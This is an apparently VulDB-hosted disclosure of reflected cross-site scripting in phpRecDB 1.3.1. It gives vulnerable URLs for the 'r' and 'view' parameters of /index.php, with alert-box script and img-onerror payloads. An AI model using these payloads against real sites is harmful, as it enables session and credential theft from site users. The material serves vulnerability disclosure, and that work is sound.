| Title | phpRecDB 1.3.1 - Reflected XSS |
|---|
| Description | # Exploit Title: phpRecDB 1.3.1 - Reflected XSS
# Exploit Author: skalvin aka (CraCkEr)
# Date: 30/07/2023
# Vendor: phprecdb.com
# Vendor Homepage: http://www.phprecdb.com/
# Software Link: http://www.phprecdb.com/demo/
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
## Description
The attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials
Path: /index.php
GET parameter 'r' is vulnerable to XSS
http://website/index.php?ajax=yw0&r=site%2fpage[XSS]&sort=Artist&view=news
XSS Payload: ov8mn<img src=a onerror=alert(1)>expro
Path: /index.php
GET parameter 'view' is vulnerable to XSS
http://www.website/index.php?ajax=yw0&r=site%2Fpage&sort=Artist&view=news[XSS]
XSS Payload: p96xr<script>alert(1)</script>axjwn
[-] Done |
|---|
| User | skalvin (UID 49463) |
|---|
| Submission | 07/30/2023 00:38 (3 years ago) |
|---|
| Moderation | 08/15/2023 12:09 (16 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 237194 [phpRecDB 1.3.1 /index.php r/view cross site scripting] |
|---|
| Points | 17 |
|---|